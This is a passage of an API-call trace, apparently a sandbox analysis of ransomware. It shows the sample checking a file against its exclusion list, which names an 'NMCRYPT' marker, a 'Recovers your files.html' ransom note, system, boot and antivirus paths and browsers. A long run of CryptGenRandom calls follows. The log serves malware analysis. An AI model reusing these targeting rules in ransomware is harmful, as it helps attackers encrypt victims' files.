lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0161.109] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0161.109] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0161.109] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0161.109] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0161.109] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0161.109] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0161.109] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0161.109] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0161.109] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0161.109] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0161.109] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0161.110] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0161.110] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui", pszSpec="*") returned 1 [0161.110] strlen (_Str="NMoreira") returned 0x8 [0161.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.110] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.111] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | 